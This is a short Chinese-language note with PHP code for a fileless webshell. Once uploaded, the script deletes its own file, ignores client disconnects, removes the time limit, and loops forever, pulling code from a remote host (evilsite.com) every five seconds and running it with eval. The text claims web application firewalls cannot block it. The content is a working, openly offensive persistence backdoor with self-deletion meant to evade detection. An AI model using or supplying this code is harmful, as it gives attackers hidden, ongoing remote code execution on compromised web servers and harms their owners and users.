【分析】利用php的无文件木马,上传一个运行后会删除自己的脚本。它会驻留在内存中运行,脚本内容是一个死循环:隔一段时间运行一下远程VPS上的代码。这种没有文件落地的webshell想必waf也没办法拦截
【代码】
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);//Windows 最好不要设置为 0
$remote_file ='http://www.evilsite.com/eval.txt';
while($code =file_get_contents($remote_file)){
@eval($code);
sleep(5);//休眠时间
};
?>